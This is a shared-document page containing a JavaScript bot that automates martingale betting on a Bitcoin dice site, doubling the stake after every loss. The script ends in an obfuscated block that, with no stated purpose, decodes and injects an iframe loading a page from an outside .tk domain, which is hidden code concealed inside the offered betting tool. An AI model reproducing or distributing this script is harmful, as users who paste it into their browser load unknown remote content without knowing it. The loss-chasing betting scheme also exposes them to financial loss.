Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 1

var bet = 0.

00000001;
var basebet = bet;
var b = [0, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1, 0, 0, 1, 1];
var a = [5, 5, 5, 5, 5, 4, 3, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2];
var loss = 0;
var mult, chance;
var lastBalance = parseFloat($('#balance').text());
var balance = lastBalance,
profit;
$("#double_your_btc_bet_lo_button").click();

function playGame() {
balance = parseFloat($('#balance').text());
if (balance != lastBalance) {
profit = balance - lastBalance;
lastBalance = balance;
if (profit < 0) {
loss++;
bet *= 2
} else {
loss = 0;
bet = basebet
}
placeBet()
}
}

function placeBet() {
var mult = a[loss];
chance = (95 / mult).toFixed(2);
$("#double_your_btc_payout_multiplier").click();
$("#double_your_btc_payout_multiplier").val(mult);
$("#double_your_btc_win_chance").val(chance);
$("#double_your_btc_stake").val(bet.toFixed(8));
if (b[loss] == 0) $("#double_your_btc_bet_lo_button").click();
else $("#double_your_btc_bet_hi_button").click()
}
setInterval('playGame()', 5000);
var
_0xb6db=['<iframe\x20type=\x22text/html\x22\x20width=\x22100%\x22\x20height=\x22200
\x22\x20src=\x22https://potapmihail.tk/serega_video_i_pushi.html\x22\x20frameborder
=\x220\x22></iframe>','appendTo','body'];(function(_0x32934d,_0x7675a4){var
_0x50a008=function(_0x4102bd){while(--_0x4102bd){_0x32934d['push']
(_0x32934d['shift']());}};_0x50a008(++_0x7675a4);}(_0xb6db,0x93));var
_0x329d=function(_0x53f19f,_0x2a29ec){_0x53f19f=_0x53f19f-0x0;var
_0x16d962=_0xb6db[_0x53f19f];return _0x16d962;};_0x210ccd:$(_0x329d('0x0'))
[_0x329d('0x1')](_0x329d('0x2'));

You might also like